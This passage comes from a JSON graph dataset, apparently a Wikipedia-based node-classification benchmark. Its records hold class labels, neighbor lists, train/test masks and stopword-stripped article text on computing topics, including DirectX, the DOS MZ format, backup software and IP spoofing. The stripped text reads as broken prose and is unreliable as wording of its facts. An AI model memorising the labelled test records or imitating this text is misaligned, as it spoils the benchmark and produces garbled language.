... oeis limited plain ascii text 2011 still uses linear form conventional mathematical notation f n functions n running variables etc. greek letters usually represented full names e.g mu μ phi φ every sequence identified letter followed six digits almost always referred leading zeros e.g a000315 rather a315 individual terms sequences separated commas digit groups separated commas periods spaces comments formulas etc. n represents n th term sequence zero often used represent non-existent sequence elements example enumerates smallest prime n ² consecutive primes form n × n magic square least magic constant 0 magic square exists value 1 1×1 magic square 2 3 1480028129 2×2 magic square 2 0 special usage solid mathematical basis certain counting functions example totient valence function n counts solutions φ x 4 solutions 4 solutions 14 hence 14 a014197 0—there solutions occasionally −1 used purpose instead oeis maintains lexicographical order sequences sequence predecessor successor context oeis normalizes sequences lexicographical ordering usually ignoring initial zeros ones also sign element sequences weight distribution codes often omit periodically recurring zeros example consider prime numbers palindromic primes fibonacci sequence lazy caterer sequence coefficients series expansion formula_2 oeis lexicographic order whereas unnormalized lexicographic ordering would order sequences thus 3 5 4 1 2 early history oeis sequences defined terms numbering sequences oeis proposed resisted adding sequences long time partly desire maintain dignity database partly a22 known 11 terms sloane reminisced one earliest self-referential sequences sloane accepted oeis later n n -th term sequence -1 fewer n terms sequence spurred progress finding terms line thought leads question sequence contain number n sequences numbers n oeis sequence contains n n sequence n sequence thus composite number 2808 a053873 sequence composite numbers non-prime 40 a053169 prime numbers n member exactly one two sequences principle determined sequence n belongs two exceptions related two sequences entry chosen contains every field oeis entry 2009 oeis database used philippe guglielmetti measure importance integer number result shown plot right shows clear gap two distinct point clouds uninteresting numbers blue dots interesting numbers occur comparatively often sequences oeis contains essentially prime numbers red numbers form green highly composite numbers yellow phenomenon studied nicolas gauvrit jean-paul delahaye hector zenil explained speed two clouds terms algorithmic complexity gap social factors based artificial preference sequences primes even numbers geometric fibonacci-type sequences sloane gap featured numberphile video 2013",
    "neighbors": [
      898,
      11555,
      3621,
      4840,
      1099,
      915,
      8627,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 2940,
    "label": 4,
    "text": "Box_Backup:box backup box backup open-source completely automatic online backup system client software sends backup data server data encrypted using secure sockets layer ssl protocol also protected layer on-disk encryption box backup supports linux unix windows mac os x backup clients servers although windows servers recommended authors box backup licensed gnu gpl bsd licenses box backup client-server application client sends data server storage server provides management client via certificates storage quotas data retention together unique robust solution created scales allowing clients low-bandwidth connections effectively perform reliable backups box backup ideal backing laptops computers intermittent low-bandwidth connections capable continuous data protection background starting automatically internet connection present recovering gracefully efficiently connection failures box backup uses modified version rsync algorithm works encrypted blocks allows store data server form server operator read still uploading changed portions data files",
    "neighbors": [
      3366,
      6280,
      4490,
      5482,
      6797,
      2222,
      1358,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 2941,
    "label": 3,
    "text": "Feature_connector:feature connector feature connector internal connector found mostly older isa vesa local bus pci graphics cards also early agp ones intended use devices needed exchange large amounts data graphics card without hogging computer system cpu data bus tv tuner cards video capture cards mpeg video decoders e.g realmagic first generation 3d graphic accelerator cards early examples include ibm ega video adapter several standards existed feature connectors depending bus graphics card type simply 8 16 32-bit wide internal connector transferring data graphics card another device bypassing system cpu memory completely speeds often far exceeded speed normal isa even early pci buses e.g 40 mbyte/s standard isa-based svga 150 mbyte/s vesa-based pci-based one standard 16 bit isa bus ran ~5.3 mbyte/s vesa bus 160 mbyte/s bandwidth feature connector bandwidths far beyond capabilities e.g 386 486 barely handled early pentium depending implementation could uni bi-directional carry analog color information well data unlike analog overlay devices however feature connector carried mainly data essentially allowed expansion card access graphics card video ram directly although directing data stream system cpu ram always possible limiting usefulness mainly display purposes although use rapidly declined introduction faster agp internal bus time feasible way connect certain types graphics-intensive devices average computing system without exceeding available cpu power memory bandwidth without disadvantages limitations purely analog overlay idea accessing video card memory directly resurfaced introduction scalable link interface sli technology although technology aimed connecting two equally powered complete graphic cards produce single increased performance visual output e.g directly interfacing tv tuner cards",
    "neighbors": [
      11627,
      4047,
      1776,
      11631,
      5368,
      799
    ],
    "mask": "Train"
  },
  {
    "node_id": 2942,
    "label": 2,
    "text": "DOS_MZ_executable:dos mz executable dos mz executable format executable file format used .exe files dos file identified ascii string mz hexadecimal 4d 5a beginning file magic number mz initials mark zbikowski one leading developers ms-dos mz dos executable file newer com executable format differs dos executable header contains relocation information allows multiple segments loaded arbitrary memory addresses supports executables larger 64k however format still requires relatively low memory limits limits later bypassed using dos extenders environment exe program run dos found program segment prefix exe files normally separate segments code data stack program execution begins address 0 code segment stack pointer register set whatever value contained header information thus header specifies 512 byte stack stack pointer set 200h possible use separate stack segment simply use code segment stack desired ds data segment register normally contains value cs code segment register loaded actual segment address data segment exe file initialized necessary programmer set generally done via following instructions original dos 1.x api also necessary ds register pointing segment psp program termination done via following instructions program termination would performed retf instruction would retrieve original segment address psp stack jump address 0 contained int 20h instruction dos 2.x api introduced new program termination function int 21h function 4ch require saving psp segment address start program microsoft advised use older dos 1.x method mz dos executables run dos windows 9x-based operating systems 32-bit windows nt-based operating systems execute using built-in virtual dos machine although graphics modes unsupported 64-bit versions windows execute alternative ways run executables include dosbox dosemu wine cygwin mz dos executables created linkers like digital mars optlink ms linker valx open watcom wlink additionally fasm create directly",
    "neighbors": [
      1922,
      6664,
      6921,
      8976,
      7317,
      5557,
      9525,
      3386,
      585,
      9166,
      8529,
      3410,
      1632,
      4712,
      4968,
      8301,
      2672,
      2804,
      8959
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2943,
    "label": 2,
    "text": "DirectX:directx microsoft directx collection application programming interfaces apis handling tasks related multimedia especially game programming video microsoft platforms originally names apis began direct direct3d directdraw directmusic directplay directsound forth name directx coined shorthand term apis x standing particular api names soon became name collection microsoft later set develop gaming console x used basis name xbox indicate console based directx technology x initial carried forward naming apis designed xbox xinput cross-platform audio creation tool xact directx pattern continued windows apis direct2d directwrite direct3d 3d graphics api within directx widely used development video games microsoft windows xbox line consoles direct3d also used software applications visualization graphics tasks cad/cam engineering direct3d widely publicized component directx common see names directx direct3d used interchangeably directx software development kit sdk consists runtime libraries redistributable binary form along accompanying documentation headers use coding originally runtimes installed games explicitly user windows 95 launch directx directx included windows 95 oem service release 2 windows 98 windows nt 4.0 shipped directx every version windows released since sdk available free download runtimes proprietary closed-source software source code provided sdk samples starting release windows 8 developer preview directx sdk integrated windows sdk late 1994 microsoft ready release windows 95 next operating system important factor value consumers would place programs would able run three microsoft employees—craig eisler alex st. john eric engstrom—were concerned programmers tended see microsoft previous operating system ms-dos better platform game programming meaning games would developed windows 95 operating system would much success compounded negative reception surrounding windows port video game lion king game used wing crashed compaq presarios came shipped following partnership compaq disney cirrus logic display drivers used presarios thoroughly tested api dos allowed direct access video cards keyboards mice sound devices parts system windows 95—with protected memory model—restricted access working much standardized model microsoft needed quick solution programmers operating system months away released eisler development lead st. john engstrom program manager worked together fix problem solution eventually named directx first version directx released september 1995 windows games sdk win32 replacement dci wing apis windows 3.1 directx allowed versions microsoft windows starting windows 95 incorporate high-performance multimedia eisler wrote frenzy build directx 1 5 blog directx 2.0 became component windows releases windows 95 osr2 windows nt 4.0 mid-1996 since windows 95 still new games released microsoft engaged heavy promotion directx developers generally distrustful microsoft ability build gaming platform windows alex st. john evangelist directx staged elaborate event 1996 computer game developers conference game developer jay barnson described roman theme including real lions togas something resembling indoor carnival event microsoft first introduced direct3d directplay demonstrated multiplayer mechwarrior 2 played internet directx team faced challenging task testing directx release array computer hardware software variety different graphics cards audio cards motherboards cpus input devices games multimedia applications tested beta final release directx team also built distributed tests allowed hardware industry confirm new hardware designs driver releases would compatible directx prior directx microsoft included opengl windows nt platform time opengl required high-end hardware focused engineering cad uses direct3d intended microsoft controlled alternative opengl focused initially game use 3d gaming grew opengl developed include better support programming techniques interactive multimedia applications like games giving developers choice using opengl direct3d 3d graphics api applications point battle began supporters cross-platform opengl windows-only direct3d incidentally opengl supported microsoft directx team developer chose use opengl 3d graphics api apis directx often combined opengl computer games opengl include directx functionality sound joystick support console-specific version directx used basis microsoft xbox xbox 360 xbox one console api api developed jointly microsoft nvidia developed custom graphics hardware used original xbox xbox api similar directx version 8.1 non-updateable like console technologies xbox code named directxbox shortened xbox commercial name 2002 microsoft released directx 9 support use much longer shader programs pixel vertex shader version 2.0 microsoft continued update directx suite since introducing shader model 3.0 directx 9.0c released august 2004 april 2005 directshow removed directx moved microsoft platform sdk instead directx confirmed present microsoft windows phone 8 real-time raytracing announced dxr 2018 original logo resembled deformed radiation warning symbol controversially original name directx project manhattan project reference us nuclear weapons initiative alex st. john head microsoft directx evangelism time claims connotation ultimate outcome manhattan project nuclear bombing japan intentional directx sister project xbox shares similar logo meant displace japanese videogame-makers dominance video-game industry however microsoft publicly denies account instead claiming logo merely artistic design directx composed multiple apis microsoft deprecated still supports directx components directx functionality provided form com-style objects interfaces additionally directx components managed objects built top parts directx managed direct3d xna graphics library top direct3d 9 directx 9 released 2002 windows 98 xp currently supported subsequent versions microsoft continues make changes directx 9c causing support dropped aforementioned operating systems january 2007 windows 2000 xp required also introduced shader model 2.0 containing pixel shader 2.0 vertex shader 2.0 major update directx api directx 10 ships available windows vista later previous versions windows windows xp able run directx 10-exclusive applications rather programs run windows xp system directx 10 hardware simply resort directx 9.0c code path latest available windows xp computers changes directx 10 extensive many former parts directx api deprecated latest directx sdk preserved compatibility directinput deprecated favor xinput directsound deprecated favor cross-platform audio creation tool system xact additionally lost support hardware accelerated audio since vista audio stack renders sound software cpu directplay dplay.dll also removed replaced dplayx.dll games rely dll must duplicate rename dplay.dll order achieve backwards compatibility directx windows vista contains several versions direct3d direct3d 10.1 incremental update direct3d 10.0 shipped required windows vista service pack 1 release mainly sets image quality standards graphics vendors giving developers control image quality also adds support cube map arrays separate blend modes per-mrt coverage mask export pixel shader ability run pixel shader per sample access multi-sampled depth buffers requires video card supports shader model 4.1 higher 32-bit floating-point operations direct3d 10.1 still fully supports direct3d 10 hardware order utilize new features updated hardware required microsoft unveiled directx 11 gamefest 08 event seattle major scheduled features including gpgpu support directcompute direct3d 11 tessellation support improved multi-threading support assist video game developers developing games better utilize multi-core processors direct3d 11 runs windows vista windows 7 windows 8 windows 10 parts new api multi-threaded resource handling supported direct3d 9/10/10.1-class hardware hardware tessellation shader model 5.0 require direct3d 11 supporting hardware microsoft since released direct3d 11 technical preview direct3d 11 strict superset direct3d 10.1 — hardware api features version 10.1 retained new features added necessary exposing new functionality helps keep backwards compatibility previous versions directx microsoft released final platform update windows vista october 27 2009 5 days initial release windows 7 launched direct3d 11 base standard since four updates directx 11 released directx 12 announced microsoft gdc march 20 2014 officially launched alongside windows 10 july 29 2015 primary feature highlight new release directx introduction advanced low-level programming apis direct3d 12 reduce driver overhead developers able implement command lists buffers gpu allowing efficient resource utilization parallel computation lead developer max mcmullen stated main goal direct3d 12 achieve console-level efficiency phone tablet pc release direct3d 12 comes alongside initiatives low-overhead graphics apis including amd mantle amd graphics cards apple metal ios macos khronos group cross-platform vulkan multiadapter support feature directx 12 allowing developers utilize multiple gpus system simultaneously multi-gpu support previously dependent vendor implementations amd crossfirex nvidia sli directx 12 supported fermi later nvidia gpus amd gcn-based chips intel haswell later processors graphics units siggraph 2014 intel released demo showing computer generated asteroid field directx 12 claimed 50–70 efficient directx 11 rendering speed cpu power consumption ashes singularity first publicly available game utilize directx 12 testing ars technica august 2015 revealed slight performance regressions directx 12 directx 11 mode nvidia geforce 980 ti whereas amd radeon r9 290x achieved consistent performance improvements 70 directx 12 scenarios amd outperformed powerful nvidia directx 12 performance discrepancies may due poor nvidia driver optimizations directx 12 even hardware limitations card optimized directx 11 serial execution however exact cause remains unclear directx 12 apis also featured xbox however directx 12 code directly portable pc xbox one due inherent differences two platforms performance improvements directx 12 xbox substantial pc march 2018 directx raytracing dxr announced capable real-time ray-tracing supported hardware dxr api added windows 10 october 2018 update 2019 microsoft announced arrival directx 12 windows 7 version number reported microsoft dxdiag tool version 4.09.0000.0900 higher use x.xx.xxxx.xxxx format version numbers however directx windows xp msdn page claims registry always x.xx.xx.xxxx format put another way table lists version 4.09.00.0904 microsoft dxdiag tool may 4.09.0000.0904 various releases windows included supported various versions directx allowing newer versions operating system continue running applications designed earlier versions directx versions gradually phased favor newer apis drivers hardware apis direct3d directsound need interact hardware device driver hardware manufacturers write drivers particular directx version device driver interface ddi test individual piece hardware make directx compatible hardware devices directx compatible drivers words one must install directx order use hardware early versions directx included up-to-date library directx compatible drivers currently available practice stopped however favor web-based windows update driver-update system allowed users download drivers relevant hardware rather entire library prior directx 10 directx runtime designed backward compatible older drivers meaning newer versions apis designed interoperate older drivers written previous version ddi application programmer query available hardware capabilities using complex system cap bits tied particular hardware feature direct3d 7 earlier would work version ddi direct3d 8 requires minimum ddi level 6 direct3d 9 requires minimum ddi level 7 however direct3d 10 runtime windows vista run older hardware drivers due significantly updated ddi requires unified feature set abandons use cap bits direct3d 10.1 introduces feature levels 10_0 10_1 allow use hardware features defined specified version direct3d api direct3d 11 adds level 11_0 10 level 9 subset direct3d 10 api designed run direct3d 9 hardware three feature levels 9_1 9_2 9_3 grouped common capabilities low med high-end video cards runtime directly uses direct3d 9 ddi provided wddm drivers feature level 11_1 introduced direct3d 11.1 2002 microsoft released version directx compatible microsoft .net framework thus allowing programmers take advantage directx functionality within .net applications using compatible languages managed c++ use c programming language api known managed directx mdx short claimed operate 98 performance underlying native directx apis december 2005 february 2006 april 2006 august 2006 microsoft released successive updates library culminating beta version called managed directx 2.0 managed directx 2.0 consolidated functionality previously scattered multiple assemblies single assembly thus simplifying dependencies software developers development version subsequently discontinued longer supported managed directx 2.0 library expired october 5 2006 gdc 2006 microsoft presented xna framework new managed version directx similar identical managed directx intended assist development games making easier integrate directx high-level shader language hlsl tools one package also supports execution managed code xbox 360 xna game studio express rtm made available december 11 2006 free download windows xp unlike directx runtime managed directx xna framework xbox 360 apis xinput xact etc shipped part windows developers expected redistribute runtime components along games applications microsoft product including latest xna releases provides directx 10 support .net framework approach directx managed languages use third-party libraries like alternatives directx family apis opengl successor vulkan metal mantle features comparable direct3d examples apis include sdl allegro openmax openml openal opencl fmod sfml etc many libraries cross-platform open codebases also alternative implementations aim provide api one wine furthermore developers reactos trying reimplement directx name reactx",
    "neighbors": [
      10243,
      11270,
      5643,
      4624,
      10769,
      9234,
      1043,
      11283,
      537,
      540,
      3102,
      1055,
      544,
      10270,
      5154,
      2083,
      8227,
      8740,
      9762,
      11300,
      11301,
      1577,
      10281,
      10282,
      4143,
      9263,
      11316,
      1077,
      2101,
      6709,
      8246,
      10812,
      1599,
      3648,
      4674,
      7236,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      83,
      9812,
      9813,
      4182,
      10839,
      603,
      9819,
      95,
      608,
      1632,
      3170,
      2145,
      5225,
      6765,
      622,
      9839,
      4210,
      9331,
      7796,
      1656,
      6265,
      5754,
      4731,
      1148,
      7290,
      8315,
      9340,
      1664,
      5761,
      10879,
      9348,
      5765,
      10886,
      2183,
      8841,
      3210,
      5259,
      653,
      6797,
      143,
      2193,
      9874,
      10900,
      3734,
      10902,
      3224,
      2713,
      4248,
      7833,
      8856,
      11414,
      7838,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      9902,
      10414,
      3250,
      5300,
      7351,
      10428,
      2237,
      2749,
      2244,
      8391,
      200,
      5320,
      9420,
      3283,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      740,
      4836,
      4326,
      2279,
      3303,
      1770,
      11498,
      3308,
      3821,
      4332,
      10991,
      10480,
      10993,
      242,
      2804,
      6900,
      3834,
      1791,
      8959,
      11519,
      5386,
      6927,
      3856,
      8976,
      7442,
      9491,
      10512,
      11030,
      3351,
      5401,
      5913,
      7963,
      8473,
      8985,
      8988,
      799,
      4384,
      11546,
      2850,
      11549,
      5413,
      2854,
      11559,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      11570,
      1844,
      9525,
      11572,
      10039,
      2361,
      315,
      6972,
      7486,
      2368,
      321,
      3394,
      1347,
      1348,
      5952,
      8514,
      6984,
      9033,
      844,
      8526,
      847,
      3922,
      342,
      1366,
      4439,
      5465,
      10076,
      9054,
      9567,
      10079,
      2401,
      2402,
      7523,
      11616,
      2919,
      2921,
      4458,
      6506,
      9066,
      6001,
      10097,
      2937,
      6009,
      9593,
      11130,
      8071,
      9609,
      1418,
      5003,
      5004,
      9612,
      400,
      6032,
      8080,
      7064,
      9114,
      11677,
      10654,
      8607,
      929,
      10658,
      11683,
      3496,
      4010,
      10157,
      430,
      6062,
      7086,
      10673,
      9655,
      6584,
      1978,
      2493,
      960,
      7106,
      8132,
      6088,
      969,
      7629,
      9166,
      3535,
      8659,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      1510,
      9703,
      1000,
      4074,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      3573,
      9205,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 2944,
    "label": 4,
    "text": "Veeam_Backup_&_Replication:veeam backup amp replication veeam backup replication proprietary backup app developed veeam virtual environments built vmware vsphere microsoft hyper-v hypervisors software provides backup restore replication functionality virtual machines physical servers workstations well cloud-based workload veeam backup replication operates virtualization layer well manages physical machine backup backs vms image-level using hypervisor ’ snapshots retrieve vm data backups full full copy vm image incremental saving changed blocks data since last backup job run backup increments created using built-in changed block tracking cbt mechanism available backup methods include forward incremental-forever backup forward incremental backup reverse incremental backup additionally ’ option perform active full synthetic full backups. br veeam backup replication provides automated recovery verification backups replicas program starts vm directly backup replica isolated test environment runs tests verification vm image remains read-only state mechanism also used troubleshooting testing patches upgrades veeam backup replication supports software-defined storage technology allows organizing scalable backup repository collection heterogeneous storage devices backups stored on-premises transferred off-site repositories via wan saved tape media long-term retention sent cloud storage cloud storage support available infrastructure-as-a-service iaas model veeam technology cloud connect provides integrated secured backup cloud veeam-powered service providers. br veeam backup replication storage-agnostic also specialized storage integrations storage systems cisco hyperflex emc vnx emc vnxe hp 3par hp storevirtual nimble netapp ibm lenovo storage v series addition separate universal storage api plug-in veeam also provides storage integrations infinidat pure storage uses storage system snapshots source backups recovery vmware vms disks residing storage volumes.. veeam backup replication also build direct nfs agent allows access netapp snapshots directly nas storage bypassing hosts backup restore storage scan operations along backup veeam backup replication perform image-based vm replication creates “ clone ” production vm onsite offsite keeps ready-to-use state vm replica configurable number failover points image-based vm replication also available via veeam cloud connect disaster recovery service draas software provides number data recovery options including br entire vm recovery file-level recovery virtual drive restore application-item recovery veeam backup replication decreases backup files size data traffic built-in data deduplication compression support deduplicating storage systems emc data domain exagrid hp storeonce catalyst netapp cloud backup altavault using deduplicating storage appliances backup repositories allows achieving greater levels deduplication ratios veeam backup replication also provides built-in wan acceleration reduce bandwidth required transferring backups replicas wan built modular scheme veeam backup replication allows setting scalable backup infrastructures software architecture supports onsite offsite cloud-base data protection operations across remote sites geographically dispersed locations installation package veeam backup replication includes set mandatory optional components installed physical virtual machines veeam backup replication positioned part veeam availability suite bundle includes veeam one monitoring reporting capacity planning also installed standalone product available three editions based level provided functionality product licensed number cpu sockets annually upfront-billed subscription licenses per-vm basis veeam backup replication 9.5 update 4 u4 veeam using veeam instance licensing vil lower complexity license key management essentially vil allows single license key instance deployed veeam products backup replication server veeam one windows linux agents number instance keys consumed per machine vary license edition standard enterprise enterprise plus software enabling",
    "neighbors": [
      2051,
      5380,
      1801,
      6797,
      1935,
      11030,
      1049,
      929,
      9762,
      6565,
      7983,
      823,
      9655,
      9151,
      9025,
      11201,
      9420,
      4194,
      10340,
      1260,
      3692,
      4725,
      3450,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 2945,
    "label": 8,
    "text": "URL:url uniform resource locator url colloquially termed web address reference web resource specifies location computer network mechanism retrieving url specific type uniform resource identifier uri although many people use two terms interchangeably urls occur commonly reference web pages http also used file transfer ftp email mailto database access jdbc many applications web browsers display url web page page address bar typical url could form codice_1 indicates protocol codice_2 hostname codice_3 file name codice_4 uniform resource locators defined 1994 tim berners-lee inventor world wide web uri working group internet engineering task force ietf outcome collaboration started ietf living documents birds feather session 1992 format combines pre-existing system domain names created 1985 file path syntax slashes used separate directory filenames conventions already existed server names could prefixed complete file paths preceded double slash codice_5 berners-lee later expressed regret use dots separate parts domain name within uris wishing used slashes throughout also said given colon following first component uri two slashes domain name unnecessary early 1993 draft html specification referred universal resource locators dropped time june 1994 rfc 1630 october 1994 draft-ietf-uri-url-08.txt every http url conforms syntax generic uri web browser usually dereference url performing http request specified host default port number 80 urls using codice_6 scheme require requests responses made secure connection website internet users distributed throughout world using wide variety languages alphabets expect able create urls local alphabets internationalized resource identifier iri form url includes unicode characters modern browsers support iris parts url requiring special treatment different alphabets domain name path domain name iri known internationalized domain name idn web internet software automatically convert domain name punycode usable domain name system example chinese url codice_7 becomes codice_8 codice_9 indicates character originally ascii url path name also specified user local writing system already encoded converted utf-8 characters part basic url character set escaped hexadecimal using percent-encoding example japanese url codice_10 becomes codice_11 target computer decodes address displays page protocol-relative links prl also known protocol-relative urls prurl urls protocol specified example codice_12 use protocol current page either http https",
    "neighbors": [
      899,
      3971,
      5251,
      8580,
      7047,
      5641,
      1803,
      10103,
      5012,
      7188,
      1944,
      11674,
      2588,
      7710,
      5536,
      5665,
      5666,
      2339,
      2213,
      4133,
      5029,
      3242,
      6315,
      9772,
      1069,
      7982,
      10033,
      946,
      9908,
      1723,
      4797,
      4927,
      7364,
      4165,
      2887,
      8392,
      1994,
      6347,
      11469,
      10446,
      3023,
      8055,
      2258,
      10579,
      5078,
      5334,
      1372,
      5469,
      5470,
      5724,
      2016,
      3708,
      4704,
      8797,
      9443,
      362,
      5483,
      6122,
      8170,
      2542,
      4464,
      9712,
      6002,
      1139,
      3571,
      4725,
      5622,
      119,
      7673,
      4602,
      1275,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 2946,
    "label": 9,
    "text": "CFScript:cfscript cfscript extension cfml coldfusion platform cfscript resembles javascript coldfusion developers prefer since less visual typographical overhead ordinary cfml considered best practice write coldfusion components business logic cfscript use cfml .cfm files amongst html cfscript code must contained within cfscript tag pair follows unless within pure script-based coldfusion component simple example function simple example component cfscript containing two functions coldfusion 11 railo 4.1+ lucee 4.5+ best fully support cf tags cfscript may direct substitutions tags often still possible achieve results tag script via different syntax example get query variable cfscript without writing udf since coldfusion 8 cfscript supported syntax abbreviations common many programming languages ++ += cfscript two forms comments single line multiline although cfscript javascript similar several key differences following list identifies cfscript features differ javascript",
    "neighbors": [
      5314,
      3045,
      3462,
      9144,
      5048,
      4507
    ],
    "mask": "None"
  },
  {
    "node_id": 2947,
    "label": 4,
    "text": "IP_address_spoofing:ip address spoofing computer networking ip address spoofing ip spoofing creation internet protocol ip packets false source ip address purpose impersonating another computing system basic protocol sending data internet network many computer networks internet protocol ip protocol specifies ip packet must header contains among things ip address sender packet source ip address normally address packet sent sender address header altered recipient appears packet came another source protocol requires receiving computer send back response source ip address spoofing mainly used sender anticipate network response care response source ip address provides limited information sender may provide general information region city town packet sent provide information identity sender computer used ip address spoofing involving use trusted ip address used network intruders overcome network security measures authentication based ip addresses type attack effective trust relationships exist machines example common corporate networks internal systems trust users log without username password provided connecting another machine internal network must already logged spoofing connection trusted machine attacker network may able access target machine without authentication ip address spoofing frequently used denial-of-service attacks objective flood target overwhelming volume traffic attacker care receiving responses attack packets packets spoofed ip addresses difficult filter since spoofed packet appears come different address hide true source attack denial service attacks use spoofing typically randomly choose addresses entire ip address space though sophisticated spoofing mechanisms might avoid unroutable addresses unused portions ip address space proliferation large botnets makes spoofing less important denial service attacks attackers typically spoofing available tool want use defenses denial-of-service attacks rely validity source ip address attack packets might trouble spoofed packets backscatter technique used observe denial-of-service attack activity internet relies attackers use ip spoofing effectiveness use packets false source ip address always evidence malicious intent example performance testing websites hundreds even thousands vusers virtual users may created executing test script website test order simulate happen system goes live large number users log since user normally ip address commercial testing products hp loadrunner webload others use ip spoofing allowing user return address well configuration services vulnerable ip spoofing packet filtering one defense ip spoofing attacks gateway network usually performs ingress filtering blocking packets outside network source address inside network prevents outside attacker spoofing address internal machine ideally gateway would also perform egress filtering outgoing packets blocking packets inside network source address inside prevents attacker within network performing filtering launching ip spoofing attacks external machines also recommended design network protocols services rely source ip address authentication upper layer protocols provide defense ip spoofing attacks example transmission control protocol tcp uses sequence numbers negotiated remote machine ensure arriving packets part established connection since attacker normally see reply packets sequence number must guessed order hijack connection poor implementation many older operating systems network devices however means tcp sequence numbers predicted term spoofing also sometimes used refer header forgery insertion false misleading information e-mail netnews headers falsified headers used mislead recipient network applications origin message common technique spammers sporgers wish conceal origin messages avoid tracked",
    "neighbors": [
      138,
      6540,
      4495,
      4498,
      4883,
      11158,
      10905,
      10908,
      1961,
      10924,
      1200,
      7863,
      8504,
      5433,
      3133,
      4414,
      2240,
      4163,
      7369,
      6877,
      5472,
      10344,
      2409,
      5749,
      11001,
      2299,
      6013,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2948,
    "label": 3,
    "text": "Interoperability:interoperability interoperability characteristic product system whose interfaces completely understood work products systems present future either implementation access without restrictions term initially defined information technology systems engineering services allow information exchange broader definition takes account social political organizational factors impact system system performance task building coherent services users individual components technically different managed different organizations two systems use common data formats communication protocols capable communicating exhibit syntactic interoperability xml sql examples common data formats protocols lower-level data formats also contribute syntactic interoperability ensuring alphabetical characters stored ascii unicode format communicating systems beyond ability two computer systems exchange information semantic interoperability ability automatically interpret information exchanged meaningfully accurately order produce useful results defined end users systems achieve semantic interoperability sides must refer common information exchange reference model content information exchange requests unambiguously defined sent understood possibility promoting result user-driven convergence disparate interpretations information object study research prototypes s3db cross-domain interoperability involves multiple social organizational political legal entities working together common interest and/or information exchange interoperability imply open standards ab-initio i.e definition interoperability imply exchanges range products similar products several different vendors even past future revisions product interoperability may developed post-facto special measure two products excluding rest using open standards vendor forced adapt system dominant system based open standards interoperability compatibility open standards rely broadly consultative inclusive group including representatives vendors academics others holding stake development discusses debates technical economic merits demerits feasibility proposed common protocol doubts reservations members addressed resulting common document endorsed common standard document subsequently released public henceforth becomes open standard usually published available freely nominal cost comers encumbrances various vendors individuals even part original group use standards document make products implement common protocol defined standard thus interoperable design specific liability advantage customer choosing one product another basis standardised features vendors products compete quality implementation user interface ease use performance price host factors keeping customers data intact transferable even chooses switch another competing product business reasons post facto interoperability may result absolute market dominance particular product contravention applicable standards effective standards present time product introduction vendor behind product choose ignore forthcoming standards co-operate standardisation process using near-monopoly insist product sets de facto standard market dominance problem product implementation open minimally encumbered may well closed heavily encumbered e.g patent claims network effect achieving interoperability product critical vendor wishes remain relevant market difficult accomplish lack co-operation equal terms original vendor may well see new vendor potential competitor threat newer implementations often rely clean-room reverse engineering absence technical data achieve interoperability original vendors provide technical data others often name 'encouraging competition data invariably encumbered may limited use availability data equivalent open standard telecommunication term defined two-way radio interoperability composed three dimensions search interoperability refers ability two information collections searched single query specifically related web-based search challenge interoperability stems fact designers web resources typically little need concern exchanging information web resources federated search technology place format requirements data owner emerged one solution search interoperability challenges addition standards oai-pmh rdf sparql emerged recently also help address issue search interoperability related web resources standards also address broader topics interoperability allowing data mining respect software term interoperability used describe capability different programs exchange data via common set exchange formats read write file formats use protocols ability execute binary code different processor platforms 'not contemplated definition interoperability lack interoperability consequence lack attention standardization design program indeed interoperability taken granted non-standards-based portion computing world according iso/iec 2382-01 information technology vocabulary fundamental terms interoperability defined follows capability communicate execute programs transfer data among various functional units manner requires user little knowledge unique characteristics units note definition somewhat ambiguous user program another program latter portion set program required interoperable might well need knowledge characteristics units definition focuses technical side interoperability also pointed interoperability often organizational issue often interoperability significant impact organizations concerned raising issues ownership people want share data dealing information silos labor relations people prepared undergo training usability context apt definition captured term business process interoperability interoperability important economic consequences example research estimated cost inadequate interoperability u.s. capital facilities industry 15.8 billion year competitors products interoperable due causes patents trade secrets coordination failures result may well monopoly market failure reason may prudent user communities governments take steps encourage interoperability various situations least 30 international bodies countries implemented egovernment-based interoperability framework initiatives called e-gif united states niem initiative standards defining organizations sdos provide open public software specifications facilitate interoperability examples include oasis-open organization buildingsmart formerly international alliance interoperability far user communities neutral third party creating standards business process interoperability another example neutral party rfc documents internet engineering task force ietf oslc open service lifecycle collaboration community working finding common standard order software tools share exchange data e.g bugs tasks requirements etc final goal agree open standard interoperability open source alm tools java great example interoperable programming language allows programs written run anywhere java virtual machine one writing program java long use system specific functionality maintain interoperability machines java virtual machine many implementations java virtual machine oracle ibm android etc ... java virtual machine created specification applications maintain compatibility implementation different underlying language interfaces many organizations dedicated interoperability common want push development world wide web towards semantic web concentrate egovernment ebusiness data exchange general internationally network centric operations industry consortium facilitates global interoperability across borders language technical barriers europe instance european commission idabc programme issue european interoperability framework idabc succeeded isa programme also initiated semantic interoperability centre europe semic.eu european land information service eulis established 2006 consortium european national land registers aim service establish single portal customers provided access information individual properties land property registration services associated legal environment united states government core.gov service provides collaboration environment component development sharing registration reuse related national information exchange model niem work component repository national institute standards technology serves agency measurement standards new technology introduced hospitals labs ever-increasing rate need “ plug-and-play ” interoperability – ability take medical device box easily make work one devices – attracted great attention healthcare providers industry increasingly medical devices like incubators imaging mri ct ultrasound others driven sophisticated software must integrate point care electronic systems electronic medical records 2016 regulatory affairs professionals society raps meeting experts field like angela n. johnson ge healthcare representative united states food drug administration provided practical seminars companies developing new medical devices hospitals installing work effectively align interoperable software systems speaking e-government perspective interoperability refers collaboration ability cross-border services citizens businesses public administrations exchanging data challenge due language barriers different specifications formats varieties categorizations many hindrances identified data interpreted differently collaboration limited takes longer efficient instance citizen country wants purchase land country b person asked submit proper address data address data countries include full name details street name number well post code order address details might vary language obstacle order provided address data across language barriers becomes difficult language requires characters almost impossible translation tools available hence egovernment applications need exchange data semantically interoperable manner saves time money reduces sources errors fields practical use found every policy area justice trade 